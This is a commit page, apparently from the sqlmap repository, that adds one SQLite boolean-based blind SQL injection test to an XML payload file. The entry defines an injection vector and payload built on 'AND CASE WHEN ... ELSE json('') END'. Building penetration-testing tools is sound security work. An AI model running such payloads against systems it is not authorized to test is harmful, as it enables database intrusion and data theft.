Skip to content

Commit

Permalink
Add SQLite AND boolean-based blind payload (#5501)
Browse files Browse the repository at this point in the history
  • Loading branch information
sokaRepo committed Aug 26, 2023
1 parent a7cf68f commit 2f66aa8
Showing 1 changed file with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions data/xml/payloads/boolean_blind.xml
Original file line number Diff line number Diff line change
Expand Up @@ -596,6 +596,26 @@ Tag: <test>
<dbms>Oracle</dbms>
</details>
</test>

<test>
<title>SQLite AND boolean-based blind - WHERE, HAVING, GROUP BY or HAVING clause (json)</title>
<stype>1</stype>
<level>1</level>
<risk>1</risk>
<clause>1</clause>
<where>1</where>
<vector>AND CASE WHEN [INFERENCE] THEN 1 ELSE json('') END </vector>
<request>
<payload>AND CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE json('') END</payload>
</request>
<response>
<comparison>AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE json('') END</comparison>
</response>
<details>
<dbms>SQLite</dbms>
</details>
</test>

<!-- End of boolean-based blind tests - WHERE or HAVING clause -->

<!-- Boolean-based blind tests - Parameter replace -->
Expand Down

0 comments on commit 2f66aa8

Please sign in to comment.